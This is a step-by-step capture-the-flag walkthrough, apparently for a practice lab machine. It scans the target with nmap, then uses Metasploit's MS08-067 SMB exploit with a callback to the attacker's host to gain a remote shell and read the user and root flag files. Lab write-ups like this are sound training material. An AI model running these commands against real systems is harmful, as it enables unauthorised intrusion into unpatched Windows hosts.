As usual, let's start with nmap:
nmap -sV -sC 10.129.1.111

We are told to use -Pn (skip host discovery and treat the host as up), so let's try that:
nmap -Pn -sC 10.129.1.111

Port 445 (SMB) is open, so let's check it by listing the shares with:
smbclient -L 10.129.1.111

It doesn't seem to be working, so let's move on. Let's use nmap again, but this time looking for any vulnerabilities on port 445:
nmap -Pn -p 445 --script vuln 10.129.1.111

Let's see if Metasploit has an exploit available for MS08-067:
msfconsole

Now let's type:
search ms08-067

There is 1 exploit, so let's use it:
use exploit/windows/smb/ms08_067_netapi

show options

Looks like we only need to set LHOST and RHOSTS, as LPORT and RPORT are already set to their defaults.
set LHOST 10.10.14.10
This is the IP of the attacker, so your IP. If you don't know your IP, open a new command prompt and type ifconfig.
set RHOSTS 10.129.1.111
This is the IP of the remote host, so the target machine.

Type:
exploit
Now we are in!
Type:
cd "Documents and Settings"
ls

cd john
cd Desktop
ls
cat user.txt
Congratulations! You got the user flag!
Now let's go get the root flag. Type:
cd "Documents and Settings"
cd Administrator
ls
cat root.txt
Congratulations! You got the root flag!